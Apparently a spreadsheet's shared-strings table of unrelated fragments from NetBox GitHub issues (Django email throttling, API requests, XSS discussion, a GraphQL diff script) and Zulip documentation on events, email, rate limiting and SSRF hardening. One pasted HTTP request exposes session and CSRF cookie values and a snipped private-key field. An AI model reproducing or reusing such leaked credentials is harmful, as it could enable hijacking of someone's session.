    <t>I've been testing with the custom handler and it's not going to be able to live in the `configuration.py` due to the way Django looks up handlers. For now, I'm tinkering with a `netbox/handlers.py` module (same directory as `settings.py`). At the moment it doesn't appear to be working. I'm still receiving the emails but the throttling isn't working yet. ```python. # handlers.py. import datetime. import time. from django.utils.log import AdminEmailHandler. from cacheops.redis import redis_client # This uses the redis server configured for `caching`. class AdminEmailThrottle(AdminEmailHandler):. def incr_counter(self):. c = redis_client(). key = self._redis_key(). res = c.incr(key). c.expire(key, 300). return res. def _redis_key(self):. return time.strftime(. r"error_email_limiter:%Y-%m-%d_%H:%M", datetime.datetime.now().timetuple(). ). def emit(self, record):. try:. ctr = self.incr_counter(). except Exception:. pass. else:. if ctr &gt;= 10:. return. super(AdminEmailThrottle, self).emit(record). ```. ```python. # logging config. LOGGING = {. 'version': 1,. 'disable_existing_loggers': False,. 'handlers': {. 'mail_admins': {. 'level': 'ERROR',. 'class': 'netbox.handlers.AdminEmailThrottle'. }. },. 'loggers': {. 'django': {. 'handlers': ['mail_admins'],. 'level': 'ERROR',. 'propagate': True,. },. }. }. ```</t>
  </si>
  <si>
    <t>Post:. ```. POST /api/secrets/get-session-key/ HTTP/1.0.. X-Forwarded-Host. : netbox.sitename.com.. X-Real-IP: &lt;snipped&gt;.. X-Forwarded-Proto: https.. Host: localhost. . Connection: close.. Content-Length:. 1834.. X-Forwarded-For:. &lt;snipped public ip&gt;.. X-Forwarded-Port. : 443.. sec-ch-ua: "Google Chrome";v="87", " Not;A Brand";v="99", "Chromium";v="87".. dnt: 1.. sec-ch-ua-mobile: ?0.. user-agent: Mozilla/5.0 (Windows NT 10.0; Win64;x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/87.0.4280.88 Safari/537.36.. content-type: application/x-www-form-urlencoded;charset=UTF-8.. accept: application/json, text/javascript, */*;q=0.01.. x-requested-with: XMLHttpRequest.. x-csrftoken: undefined.. origin: https://netbox.sitename.com.. sec-fetch-site:same-origin.. sec-fetch-mode:cors.. sec-fetch-dest: empty.. referer: https://netbox.sitename.com/dcim/devices/914/.. accept-encoding:. gzip, deflate,br.. accept-language:en-GB,en-US;q=0.9,en;q=0.8.. cookie: csrftoken=zxskSqOQxpsFOCwlEPOzUYdofEC5nwj5sclZ4w9Bm3PX8JrPz5yyNhoZFawE5cAb; sessionid=hd2mif9me2kknp9vndhxifevco88mas4;AWSALB=agpswU3Pi04XbWgukX4VwXJ16AAW7fyIPQ8GOcMc5sDegsBscCAPxf5s3QGwxH77Vz/XhOVOfll+L3whwBuUABRrCvIwEU4TSpnUadjCYzsiy0yEQ0mEmAbFQubZ; AWSALBCORS=agpswU3Pi04XbWgukX4VwXJ16AAW7fyIPQ8GOcMc5sDegsBscCAPxf5s3QGwxH77Vz/XhOVOfll+L3whwBuUABRrCvIwEU4TSpnUadjCYzsiy0yEQ0mEmAbFQubZ.. .. private_key=----. -BEGIN+RSA+PRIVATE. ~SNIPPED~. --END+RSA+PRIVATE. ```. Response:. ```. HTTP/1.0 403 Forbidden.. Server: gunicorn/20.0.4.. Date: Tue, 15 Dec 2020 22:19:56 GMT.. Connection: close.. Content-Type: application/json.. Vary: Accept, Cookie, Origin.. Allow: POST, OPTIONS.. API-Version: 2.10.. X-Content-Type-Options: nosniff. . Referrer-Policy: same-origin.. X-Frame-Options: SAMEORIGIN.. Content-Length: 58.. . {"detail":"CSRF Failed: CSRF token missing or incorrect."}. ```</t>
  </si>
  <si>
    <t>There are two approaches to this:. 1. Pre-render and store the utilization for prefixes as changes are made in NetBox, then include this value in the API serializer. 2. Extend the serializer to call the `get_utilization()` method on demand. IMO the first option, while more challenging to implement, would be the preferred solution, as it also knocks out a good amount of overhead when viewing the prefixes list. The second option, because of the additional overhead it would impose on REST API requests, would probably need some mechanism to toggle its inclusion (similar to what we currently do with device/VM config contexts). I'd prefer to avoid that pattern where possible.</t>
  </si>
  <si>
    <t>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13 Sep 2021 08:08:05 GMT". },. {. "name": "Content-Type",. "value": "application/json". },. {. "name": "Content-Length",. "value": "581". },. {. "name": "Connection",. "value": "keep-alive". },. {. "name": "Vary",. "value": "Accept, Cookie, Origin". },. {. "name": "Allow",. "value": "GET, HEAD, OPTIONS". },. {. "name": "X-Content-Type-Options",. "value": "nosniff". }</t>
  </si>
  <si>
    <t>As I commented [here](https://github.com/netbox-community/netbox/issues/6606#issuecomment-861509565), implementing this elegantly will probably require that we first pre-render utilization data for all aggregates, prefixes, and ranges. I've opened #7451 to explore the idea. This proposal should be considered blocked until a decision has been made on #7451.</t>
  </si>
  <si>
    <t>A few thoughts:. 1. If we were to invoke something "heavy" like Bleach, we would need to first transition to pre-rendered HTML for all objects to mitigate the performance penalty. This would be a major change representing significant effort. 2. There may be valid use cases for `javascript:` links, particularly where plugins are in use. 3. Even using Bleach doesn't guarantee complete protection against XSS. The only surefire approach would be to strip _all_ HTML tags, which is obviously undesirable.</t>
  </si>
  <si>
    <t>I think that makes sense, yeah. It's probably good practice to clear the cache on upgrade anyway. Related, I also want to look into pre-rendering the API spec at release time. I'm not sure exactly what that process would look like, but it would avoid the caching issue entirely, and potentially allow us to add the REST API spec to the documentation using [mkdocs-plugins](https://github.com/Neoteroi/mkdocs-plugins). (But that's another discussion.)</t>
  </si>
  <si>
    <t>ry.py, line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t>
  </si>
  <si>
    <t>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HTTP_X_FORWARDED_P</t>
  </si>
  <si>
    <t>m/en/product/opticalcon-quad-lite)*. [MTP 12](https://www.neutrik.com/en/product/opticalcon-mtp-12-lite). [MTP 24](https://www.neutrik.com/en/product/opticalcon-mtp-24-lite). **OpticalCon Dragonfly**. [Male](https://www.neutrik.com/en/product/no2mw-xp)*. [Female](https://www.neutrik.com/en/product/no2fw-xp)*. **OpticalCon Advanced**. [Duo](https://www.neutrik.com/en/product/no2-4fdw-a). [Quad](https://www.neutrik.com/en/product/no4fdw-a)*. [MTP 12](https://www.neutrik.com/en/product/no12fdw-a). [MTP 16](https://www.neutrik.com/en/product/no16fdw-a). [MTP 24](https://www.neutrik.com/en/product/no24fdw-a). [MTP 48](https://www.neutrik.com/en/product/no48fdw-a). **FibreFox**. [2 Channel](https://www.neutrik.com/en/product/fiberfox-2ch-bridge)*. [4 Channel](https://www.neutrik.com/en/product/fiberfox-4ch-bridge)*. **OpticalCon Hybrid Med**. [MTP 16 + 2](https://www.neutrik.com/en/product/opticalcon-hybrid-med-chassis). * *Missing Data sheet due to an error on Neutrik's site. May be rate limiting as I am downloading a lot in a short period of time*. Data Sheets:. [opticalcon-hybrid-med-chassis.pdf](https://github.com/netbox-community/netbox/files/12320917/opticalcon-hybrid-med-chassis.pdf). [opticalcon-lite-mtp24.pdf](https://github.com/netbox-community/netbox/files/12320918/opticalcon-lite-mtp24.pdf). [opticalcon-lite-mtp12.pdf](https://github.com/netbox-community/netbox/files/12320919/opticalcon-lite-mtp12.pdf). [opticalcon-advanced-mtp48.pdf](https://github.com/netbox-community/netbox/files/12320920/opticalcon-advanced-mtp48.pdf). [opticalcon-advanced-mtp24.pdf](https://github.com/netbox-community/netbox/files/12320921/opticalcon-advanced-mtp24.pdf). [opticalcon-advanced-mtp16.pdf](https://github.com/netbox-community/netbox/files/12320922/opticalcon-advanced-mtp16.pdf). [opticalcon-advanced-mtp12.pdf](https://github.com/netbox-community/netbox/files/12320923/opticalcon-advanced-mtp12.pdf). [opticalcon-advanced-duo.pdf](https://github.com/netbox-community/netbox/files/</t>
  </si>
  <si>
    <t>Script for testing match of the schemas (will keep it updated as needed):. ```. # An example to get the remaining rate limit using the Github GraphQL API. import requests. headers = {"Authorization": "Bearer YOUR API KEY"}. headers = None. new_url = 'http://127.0.0.1:8000/graphql/'. old_url = 'https://demo.netbox.dev/graphql/'. def run_query(url, query): # A simple function to use requests.post to make the API call. Note the json= section. request = requests.post(url, json={'query': query}, headers=headers). if request.status_code == 200:. return request.json(). else:. raise Exception("Query failed to run by returning code of {}. {}".format(request.status_code, query)). # The GraphQL query (with a few aditional bits included) itself defined as a multi-line string. query_schema = """. {. __schema {. queryType {. fields {. name. type {. name. }. }. }. }. }. """. def get_all_endpoints(url):. query = """. {. __schema {. types {. name. }. }. }. """. types = run_query(url, query). types = types["data"]["__schema"]["types"]. all_types = []. for type in types:. name = type["name"]. if name.endswith("Type"):. all_types.append(name). all_types.sort(). return all_types. new_endpoints = get_all_endpoints(new_url). old_endpoints = get_all_endpoints(old_url). print("Main Endpoint Diff"). print(set(old_endpoints) - set(new_endpoints)). print(""). def get_endpoint_types(url, endpoint):. query = f""". {{. __type(name: "{endpoint}") {{. name. fields {{. name. type {{. name. kind. }}. }}. }}. }}. """. types = run_query(url, query). types = types["data"]["__type"]["fields"]. all_types = []. for type in types:. name = type["name"]. all_types.append(name). all_types.sort(). return all_types. checked = 0. failed = 0. success = 0. for endpoint in new_endpoints:. if endpoint != 'DjangoImageType' and endpoint != 'DjangoModelType':. checked += 1. new_types = get_endpoint_types(new_url, endpoint). old_types = get_endpoint_types(old_url, endpoint). diff = set(old_types) - set(new_types). if dif</t>
  </si>
  <si>
    <t>Thanks for taking the time to report this @marsteel! Turns out this is the reason I had an issue with DNS rate limiting last week. :laughing:</t>
  </si>
  <si>
    <t>tions use a `User-Agent` that starts. with something like `ZulipMobile/20.0.103 `, encoding the name of the. application and it's version. Zulip's official API bindings have reasonable defaults for. `User-Agent`.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</si>
  <si>
    <t>docs</t>
  </si>
  <si>
    <t>`User-Agent`.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limit. [rate-limiting-rules]: https://zulip.readthedocs.io/en/latest/production/security-model.html#rate-limiting. [integrations-channel]: https://chat.zulip.org/#narrow/channel/127-integrations/.</t>
  </si>
  <si>
    <t># Real-time events API. Zulip's real-time events API lets you write software that reacts. immediately to events happening in Zulip. This API is what powers the. real-time updates in the Zulip web and mobile apps. As a result, the. events available via this API cover all changes to data displayed in. the Zulip product, from new messages to channel descriptions to. emoji reactions to changes in user or organization-level settings. ## Using the events API. The simplest way to use Zulip's real-time events API is by using. `call_on_each_event` from our Python bindings. You just need to write. a Python function (in the examples below, the `lambda`s) and pass it. into `call_on_each_event`; your function will be called whenever a new. event matching the specified parameters (`event_types`, `narrow`,. etc.) occurs in Zulip. `call_on_each_event` takes care of all the potentially tricky details. of long-polling, error handling, exponential backoff in retries, etc. It's cousin, `call_on_each_message`, provides an even simpler. interface for processing Zulip messages. More complex applications (like a Zulip terminal client) may need to. instead use the raw [register](/api/register-queue) and. [events](/api/get-events) endpoints. ## Usage examples. {start_tabs}. {tab|python}. ```. #!/usr/bin/env python. import sys. import zulip. # Pass the path to your zuliprc file here. client = zulip.Client(config_file="~/zuliprc"). # Print every message the current user would receive. # This is a blocking call that will run forever. client.call_on_each_message(lambda msg: sys.stdout.write(str(msg) + "\n")). # Print every event relevant to the user. # This is a blocking call that will run forever. client.call_on_each_event(lambda event: sys.stdout.write(str(event) + "\n")). ```. {end_tabs}. ## Parameters. You may also pass in the following keyword arguments to `call_on_each_event`:. {generate_api_arguments_table|zulip.yaml|/real-time:post}. See the [GET /events](/api/get-events) documentation f</t>
  </si>
  <si>
    <t xml:space="preserve">t not to logged out visitors:. * Presence information, i.e. whether the user is currently online,. [their status](/help/status-and-availability),. and whether they have set themselves as unavailable. * Detailed profile information, such as [custom profile. fields](/help/custom-profile-fields). * Which users are subscribed to which web-public channels. ## Managing abuse. The unfortunate reality is that any service. that allows hosting files visible to the Internet is a potential target for bad. actors looking for places to distribute illegal or malicious content. In order to protect Zulip organizations from. bad actors, web-public channels have a few limitations designed to make. Zulip an inconvenient target:. * Only users in trusted roles (moderators and administrators) can be given. permission to create web-public channels. This is intended to make it hard. for an attacker to host malicious content in an unadvertised web-public. channel in a legitimate organization. * There are rate limits for unauthenticated access to uploaded. files, including viewing avatars and custom emoji. Our aim is to tune anti-abuse protections so that they don't. interfere with legitimate use. Please [contact us](/help/contact-support). if your organization encounters any problems with legitimate activity caused. these anti-abuse features. As a reminder, Zulip Cloud organizations are expected to. [moderate content](/help/moderating-open-organizations) to ensure compliance. with [Zulip's Rules of Use](https://zulip.com/policies/rules). ## Caveats. * Web-public channels do not yet support search engine indexing. You. can use [zulip-archive](https://github.com/zulip/zulip-archive) to. create an archive of a Zulip organization that can be indexed by. search engines. * The web-public view is not yet integrated with Zulip's live-update. system. As a result, a visitor will not see new messages that are. sent to a topic they are currently viewing without reloading the. browser window. ## Related </t>
  </si>
  <si>
    <t>This log is. displayed by the `/emails` endpoint. (e.g., http://zulip.zulipdev.com:9991/emails). - Print a friendly message on console advertising `/emails` to make. this nice and discoverable. ### Testing in a real email client. You can also forward all the emails sent in the development. environment to an email account of your choice by clicking on. **Forward emails to an email account** on the `/emails` page. This. feature can be used for testing how the emails gets rendered by. actual email clients. This is important because web email clients. have limited CSS functionality, autolinkify things, and otherwise. mutate the HTML email one can see previewed on `/emails`. To do this sort of testing, you need to set up an outgoing SMTP. provider. Our production advice for. [Gmail](../production/email.md#using-gmail-for-outgoing-email) and. [transactional email. providers](../production/email.md#free-outgoing-email-services) are. relevant; you can ignore the Gmail warning as Gmail's rate limits are. appropriate for this sort of low-volume testing. Once you have the login credentials of the SMTP provider, since there. is not `/etc/zulip/settings.py` in development, configure it using the. following keys in `zproject/dev-secrets.conf`. - `email_host` - SMTP hostname. - `email_port` - SMTP port. - `email_host_user` - Username of the SMTP user. - `email_password` - Password of the SMTP user. - `email_use_tls` - Set to `true` for most providers. Else, don't set any value. Here is an example of how `zproject/dev-secrets.conf` might look if. you are using Gmail. ```ini. email_host = smtp.gmail.com. email_port = 587. email_host_user = username@gmail.com. email_use_tls = true. # This is different from your Gmail password if you have 2FA enabled for your Google account. # See the configuring Gmail to send email section above for more details. email_password = gmail_password. ```. ### Notes. - Images won't be displayed in a real email client unless you change. the `images_base_url</t>
  </si>
  <si>
    <t>essor. - When the two processors disagree, we set `marked_expected_output` in. the fixtures; this will ensure that the syntax stays that way. If. the differences are important (i.e. not just whitespace), we should. also open an issue on GitHub to track the problem. - For mobile push notifications, we need a text version of the. rendered content, since the APNS and GCM push notification systems. don't support richer markup. Mostly, this involves stripping HTML,. but there's some syntax we take special care with. Tests for what. this plain-text version of content should be stored in the. `text_content` field. If you're going to manually test some changes in the frontend Markdown. implementation, the easiest way to do this is as follows:. 1. Log in to your development server. 2. Stop your Zulip server with Ctrl-C, leaving the browser open. 3. Compose and send the messages you'd like to test. They will be. locally echoed using the frontend rendering. This procedure prevents any server-side rendering. If you don't do. this, backend will likely render the Markdown you're testing and swap. it in before you can see the frontend's rendering. If you are working on a feature that breaks multiple testcases, and want. to debug the testcases one by one, you can add `"ignore": true` to any. testcases in `markdown_test_cases.json` that you want to ignore. This. is a workaround due to lack of comments support in JSON. Revert your. "ignore" changes before committing. After this, you can run the frontend. tests with `tools/test-js-with-node markdown` and backend tests with. `tools/test-backend zerver.tests.test_markdown.MarkdownFixtureTest.test_markdown_fixtures`. ## Changing Zulip's Markdown processor. First, you will likely find these third-party resources helpful:. - **[Python-Markdown](https://pypi.python.org/pypi/Markdown)** is the Markdown. library used by Zulip as a base to build our custom Markdown syntax upon. - **[Python's XML ElementTree](https://docs.python.org/3/library/x</t>
  </si>
  <si>
    <t># Real-time push and events. Zulip's "events system" is the server-to-client push system that. powers our real-time sync. This document explains how it works; to. read an example of how a complete feature using this system works,. check out the. [new application feature tutorial](../tutorials/new-feature-tutorial.md). Any single-page web application like Zulip needs a story for how. changes made by one client are synced to other clients, though having. a good architecture for this is particularly important for a chat tool. like Zulip, since the state is constantly changing. When we talk. about clients, think a browser tab, mobile app, or API bot that needs. to receive updates to the Zulip data. The simplest example is a new. message being sent by one client; other clients must be notified in. order to display the message. But a complete application like Zulip. has dozens of different types of data that need to be synced to other. clients, whether it be new channels, changes in a user's name or. avatar, settings changes, etc. In Zulip, we call these updates that. need to be sent to other clients **events**. An important thing to understand when designing such a system is that. events need to be synced to every client that has a copy of the old. data if one wants to avoid clients displaying inaccurate data to. users. So if a user has two browser windows open and sends a message,. every client controlled by that user as well as any recipients of the. message, including both of those two browser windows, will receive. that event. (Technically, we don't need to send events to the client. that triggered the change, but this approach saves a bunch of. unnecessary duplicate UI update code, since the client making the. change can just use the same code as every other client, maybe plus a. little notification that the operation succeeded). Architecturally, there are a few things needed to make a successful. real-time sync system work:. - **Generation**. Generating events when</t>
  </si>
  <si>
    <t>tfix-email]. for additional advice. [postfix-email]: https://stackoverflow.com/questions/26333009/how-do-you-configure-django-to-send-mail-through-postfix. ### Using Gmail for outgoing email. We don't recommend using an inbox product like Gmail for outgoing. email, because Gmail's anti-spam measures make this annoying. But if. you want to use a Gmail account to send outgoing email anyway, here's. how to make it work:. - Create a totally new Gmail account for your Zulip server; you don't. want Zulip's automated emails to come from your personal email address. - If you're using 2-factor authentication on the Gmail account, you'll. need to use an. [app-specific password](https://support.google.com/accounts/answer/185833). - If you're not using 2-factor authentication, read this Google. support answer and configure that account as. ["less secure"](https://support.google.com/accounts/answer/6010255);. Gmail doesn't allow servers to send outgoing email by default. - Note also that the rate limits for Gmail are also quite low. (e.g., 100 / day), so it's easy to get rate-limited if your server. has significant traffic. For more active servers, we recommend. moving to a free account on a transactional email service. ### Logging outgoing email to a file for prototyping. For prototyping, you might want to proceed without setting up an email. provider. If you want to see the emails Zulip would have sent, you. can log them to a file instead. To do so, add these lines to `/etc/zulip/settings.py`:. ```python. EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'. EMAIL_FILE_PATH = '/var/log/zulip/emails'. ```. Then outgoing emails that Zulip would have sent will just be written. to files in `/var/log/zulip/emails/`. Remember to delete this configuration (and restart the server) if you. later set up a real SMTP provider! ## Troubleshooting. You can quickly test your outgoing email configuration using:. ```bash. su zulip -c '/home/zulip/deployments/current/manage.py sen</t>
  </si>
  <si>
    <t>rmation is leaked.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t>
  </si>
  <si>
    <t>ssrf</t>
  </si>
  <si>
    <t>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installer. If you'd</t>
  </si>
  <si>
    <t xml:space="preserve"> give bots the. `can_forge_sender` permission, which is needed for certain special API features. - `./manage.py export_single_user`: does a limited version of the [main. export tools](export-and-import.md) containing just. the messages accessible by a single user. - `./manage.py unarchive_channel`:. [Reactivates](https://zulip.com/help/archive-a-channel#unarchiving-archived-channels). an archived channel. - `./manage.py reactivate_realm`: Reactivates a realm. - `./manage.py deactivate_user`: Deactivates a user. This can be done. more easily in Zulip's organization administrator UI. - `./manage.py delete_user`: Completely delete a user from the database. For most purposes, deactivating users is preferred, since that does not. alter message history for other users. See the `./manage.py delete_user --help` documentation for details. - `./manage.py reset_authentication_attempt_count`: If a user failed authentication. attempts too many times and further attempts are disallowed by the rate limiter,. this can be used to reset the limit. All of our management commands have internal documentation available. via `manage.py command_name --help`. ## Custom management commands. Zulip supports several mechanisms for running custom code on a. self-hosted Zulip server:. - Using an existing [integration][integrations] or writing your own. [webhook integration][webhook-integrations] or [bot][writing-bots]. - Writing a program using the [Zulip API][zulip-api]. - [Modifying the Zulip server][modifying-zulip]. - Using the interactive [management shell](#managepy-shell),. documented above, for one-time work or prototyping. - Writing a custom management command, detailed here. Custom management commands are Python 3 programs that run inside. Zulip's context, so that they can access its libraries, database, and. code freely. They can be the best choice when you want to run custom. code that is not permitted by Zulip's security model (and thus can't. be done more easily using the [REST API]</t>
  </si>
  <si>
    <t>ip/manifests/profile/standalone.pp.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t>
  </si>
  <si>
    <t>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 hostn</t>
  </si>
  <si>
    <t xml:space="preserve">P_SERVICE_SUBMIT_USAGE_STATISTICS=False` in `/etc/zulip/settings.py`. - Totals for messages sent and read with subtotals for various. combinations of clients and integrations. - Totals for active users under a few definitions (1day, 7day, 15day). and related statistics. Some of the graphs on your server's [usage statistics. page](https://zulip.com/help/analytics)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 /home/zulip/deployments/current/manage.py update_analytics_counts. ```. Our use of uploaded usage statistics is governed by the same [Terms of. Service](https://zulip.com/policies/terms) and [Privacy. Policy](https://zulip.com/policies/privacy) that covers the Mobile. Push Notification Service itself. ##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support](https://zulip.com/help/contact-support). ##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t>
  </si>
  <si>
    <t xml:space="preserve"> images, improving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
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>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 The `RATE_LIMITING_RULES` setting can be used to override specific. rules. See the comment in the file for more specific details on how. to do it. After changing the setting, we recommend using. `/home/zulip/deployments/current/scripts/get-django-setting. RATE_LIMITING_RULES` to verify your changes. You can then restart. the Zulip server with `scripts/restart-server` to have the new. configuration take effect. - The `RATE_LIMIT_TOR_TOGETHER` setting can be set to `True` to group all. known exit nodes of [TOR](https://www.torproject.org/) together for purposes. of IP address limiting. Since traffic from a client using TOR is distributed. across its exit nodes, without enabling this setting, TOR can otherwise be. used to avoid IP-based rate limiting. The updated list of TOR exit nodes. is refetched once an hour. - If a user runs into the rate limit for login attempts, a server. administrator can clear this state using the. `manage.py reset_authentication_attempt_count`. [management command][management-commands]. See also our [API documentation on rate limiting][rate-limit-api]. [management-commands]: ../production/management-commands.md. [rate-limit-api]: https://zulip.com/api/rest-error-handling#rate-limit-exceeded. ## Final notes and security response. If you find some aspect of Zulip that seems inconsistent with this. security model, please report it to security@zulip.com so that we can. investigate and coordinate an appropriate security release if needed. Zulip security announcements will be sent to. zulip-announce@googlegroups.com, so you should subscribe if you are. running Zulip in production.</t>
  </si>
  <si>
    <t>en from a cookie,. or from an `email:api-key` string given via HTTP basic auth for API. clients. It will then look up what HTTP verb was used (GET, POST, etc) to make. the request, and then figure out which view to show from that. In our example,. ```python. GET=get_members_backend,. PUT=create_user_backend. ```. are supplied as arguments to `rest_path`, along with the. [HTTPRequest](https://docs.djangoproject.com/en/5.0/ref/request-response/). The request has the HTTP verb `PUT`, which `rest_dispatch` can use to. find the correct view to show:. `zerver.views.users.create_user_backend`. ## The view will authorize the user, extract request variables, and validate them. This is covered in good detail in the [writing views doc](writing-views.md). ## Results are given as JSON. Our API works on JSON requests and responses. Every API endpoint should. `raise JsonableError` in the case of an error, which gives a JSON string:. ```json. {"result": "error", "msg": "&lt;some error message&gt;", "code": "BAD_REQUEST"}. ```. in a [Django HttpResponse. object](https://docs.djangoproject.com/en/5.0/ref/request-response/). with a `Content-Type` of 'application/json'. To pass back data from the server to the calling client, in the event of. a successfully handled request, we use `json_success(request, data)`. The `request` argument is a [Django HttpRequest. object](https://docs.djangoproject.com/en/5.0/ref/request-response/). The `data` argument is a Python object which can be converted to a JSON. string and has a default value of an empty Python dictionary. Zulip stores additional metadata it has associated with that HTTP. request in a `RequestNotes` object, which is primarily accessed in. common code used in all requests (middleware, logging, rate limiting,. etc.). This will result in a JSON string:. ```json. {"result": "success", "msg": "", "data": {"var_name1": "var_value1", "var_name2": "var_value2"}}. ```. with an HTTP 200 status and a `Content-Type` of 'application/json'. That's it!</t>
  </si>
  <si>
    <t>reduced bandwidth</t>
  </si>
  <si>
    <t xml:space="preserve"> required before. upgrading. Once you've upgraded, while you're [updating your settings.py. documentation][update-settings-docs], we recommend updating. `/etc/zulip/settings.py` to use the modern settings names: Replacing. `PUSH_NOTIFICATIONS_BOUNCER_URL = "https://push.zulipchat.com"` with. `ZULIP_SERVICE_PUSH_NOTIFICATIONS = True` and renaming. `SUBMIT_USAGE_STATISTICS` to. `ZULIP_SERVICE_SUBMIT_USAGE_STATISTICS`, if you have either of those. settings enabled. It's important not to set both the old and new. settings: The legacy settings will be ignored if the modern ones are. present. The one minor functional change in this restructuring is that it is. now possible to configure sharing usage statistics with the Zulip. developers without attempting to send mobile push notifications via. the service, by setting `ZULIP_SERVICE_PUSH_NOTIFICATIONS = False`. and `ZULIP_SERVICE_SUBMIT_USAGE_STATISTICS=True`. - The Zulip server now thumbnails uploaded images for faster loading. and reduced bandwidth usage; note that only images uploaded after. upgrading to 9.0 benefit from this feature at present. Previews of. linked images/websites continue to use the original third-party. images, and thus have not yet been optimized in this way. - Installations that any point in the past enabled the. `THUMBNAIL_IMAGES` setting may have broken image previews on. messages containing previews of third-party image links while that. setting was enabled, due to incompatibilities between its approach. and the new thumbnailing system. The `THUMBNAIL_IMAGES` setting was. part of the experimental Thumbor-based thumbnailing system, which. was offered as an option starting with Zulip 1.9.0 but removed 3. years ago in Zulip 4.0. We recommend using [this chat.zulip.org. thread][thumbor-remediation-topic] to discuss remediation options. for this issue before upgrading to 9.0 if you believe your. installation may have used this setting. - We're aware of a slow memory leak in the new image thumbnailing.</t>
  </si>
  <si>
    <t xml:space="preserve"> the compose box preview widget. - Added a workaround for a bug in Chromium affecting older versions of the Zulip. desktop app that would cause horizontal lines to appear between messages. - Stopped clipping the tops of tall characters in stream and topic names. - Use internationalized form of “at” in message timestamps. - Updated translations. - Fixed the “custom” value for the. “[delay before sending message notification emails](https://zulip.com/help/email-notifications)”. setting. - Fixed an error which prevented users from changing. [stream-specific notification settings](https://zulip.com/help/channel-notifications#configure-notifications-for-a-single-channel). - Fixed the redirect from `/apps` to https://zulip.com/apps/. - Started preserving timezone information in. [Rocket.Chat imports](https://zulip.com/help/import-from-rocketchat). - Updated the Intercom integration to return success on `HEAD`. requests, which it uses to verify its configuration. - Documented how each. [rate limit](../production/security-model.md#rate-limiting). category is used. - Documented the `reset_authentication_attempt_count` command for when users. lock themselves out. - Documented the. [full S3 bucket policy](../production/upload-backends.md#s3-bucket-policy). for avatar and uploads buckets. - Clarified what the `--email` value passed to the installer will be used for. - Hid harmless "non-existent database" warnings during initial installation. - Forced a known locale when upgrading PostgreSQL, which avoids errors when. using some terminal applications. - Verified that PostgreSQL was running after upgrading it, in case a previous. try at an upgrade left it stopped. - Updated custom emoji migration 0376 to be a single SQL statement, and no. longer crash when no active owners were found. - Replaced `transifex-client` internationalization library with new. `transifex-cli`. - Began respecting proxy settings when installing `shellcheck` and `shfmt`. tools. - Fixed the invitation code t</t>
  </si>
  <si>
    <t>for users. - Improved typeahead matching algorithm for stream/user/emoji names. containing multiple spaces and other corner cases. - Improved the help center, including better display of keyboard. shortcuts, mobile documentation for common workflows and many polish. improvements. - Improved API documentation, including a new page on roles and. permissions, an audit to correct missing **Changes** entries, and. new documentation for several previously undocumented endpoints. - Improved Python static type-checking to make use of Django stubs for. `mypy`, fixing many minor bugs in the process. - Improved RealmAuditLog to cover several previously unauditable changes. - Improved the experience for users who have not logged in for a long. time, and receive an email or push notification about a private. message or personal mention. These users are now automatically soft. reactivated at the time of the notification, for a smoother. experience when they log in. - Improved the Tornado server-to-client push system's sharding system. to support realm regular expressions and experimental support for. splitting a single realm across multiple push server processes. - Improved user deactivation modal to provide details about bots and. invitations that will be disabled. - Improve matching algorithm for left sidebar stream filtering. - Improved several integrations, including CircleCI, Grafana, Harbor,. NewRelic, and the Slack compatible incoming webhook. Git webhooks. now use a consistent algorithm for choosing shortened commit IDs to. display. - Improved mention typeahead and rendering for cases where mention. syntax appears next to symbols. - Improved browser window titles used by the app to be clearer. - Improved the language in message notification emails explaining. why the notification was sent. - Improved interface for accessing stream email addresses. - Reordered the organization settings panels to be more intuitive. - Increased timeout for processing slow requests from 20s t</t>
  </si>
  <si>
    <t>ixed subtle bugs involving composing messages to deactivated users. - Fixed subtle bugs with reloading the page while viewing settings. with "Recent topics" as the default view. - Fixed bug where pending email notifications could be lost when restarting. the Zulip server. - Fixed "require topics" setting not being enforced for API clients. - Fixed several subtle Markdown rendering bugs. - Fixed several bugs with message edit history and stream/topic moves. - Fixed multiple subtle bugs that could cause compose box content to. not be properly saved as drafts in various situations. - Fixed several server bugs involving rare race conditions. - Fixed a bug where different messages in search results would be. incorrectly shown with a shared recipient bar despite potentially. not being temporally adjacent. - Fixed lightbox download button not working with the S3 upload backend. - Increased default retention period before permanently removing. deleted messages from 7 days to 30 days. - Rate limiting now supports treating all Tor exit nodes as a single IP. - Changed "From" header in invitation emails to no longer include the. name of the user who sent the invitation, to prevent anti-phishing. software from flagging invitations. - Added support for uploading animated PNGs as custom emoji.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t>
  </si>
  <si>
    <t>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older version now gives a clear error. message. - Optimized critical parts of the message sending code path for large. organizations. - Optimized creating streams in very large organizations. - Certain unprintable Unicode characters are no longer permitted in. topic names. - Added IP-based rate limiting for unauthenticated requests. - Added documentation for Zulip's rate-limiting rules. - Merged the API endpoints for a user's personal settings into the. /settings endpoint with a cleaner interface. - The server API now supports marking messages as unread, allowing. this upcoming mobile app feature to work with Zulip 5.0. - Added to the API most page-load parameters used by the web app. application that were missing from the `/register` API. - Simplified the infrastructure for rendering API documentation so. that only a few pages require Markdown templates in addition to the. OpenAPI specification file. - Corrected many minor issues with the API documentation. - Major improvements to both the infrastructure and content for. Zulip's ReadTheDocs documentation for contributors and sysadmins. - Major improvements to the mypy type-checking, discovered via. using the django-stubs project to get Django stubs. - Renamed main branch from `master` to `main`. ## Zulip Server 4.x series. ###</t>
  </si>
  <si>
    <t>e proxy through a. non-Smokescreen proxy, if one is configured; because Camo includes. logic to deny access to private subnets, routing its requests. through Smokescreen is generally not necessary. - Fixed a bug where changing the Camo secret required running. `zulip-puppet-apply`. - Fixed `scripts/setup/compare-settings-to-template` to be able to run. from any directory. - Switched Let's Encrypt renewal to use its own timer, rather than our. custom cron job. This fixes a bug where occasionally `nginx` would. not reload after getting an updated certificate. - Updated documentation and tooling to note that installs using. `upgrade-zulip-from-git` require 3 GB of RAM, or 2 GB and at least 1. GB of swap. ### Zulip Server 4.8. _Released 2021-12-01_. - CVE-2021-43791: Zulip could fail to enforce expiration dates. on confirmation keys, allowing users to potentially use expired. invitations, self-registrations, or realm creation links. - Began installing Smokescreen to harden Zulip against SSRF attacks by. default. Zulip has offered Smokescreen as an option since Zulip. 4.0. Existing installs which configured an outgoing proxy which is. not on `localhost:4750` will continue to use that; all other. installations will begin having a Smokescreen installation listening. on 127.0.0.1, which Zulip will proxy traffic through. The version of. Smokescreen was also upgraded. - Replaced the camo image proxy with go-camo, a 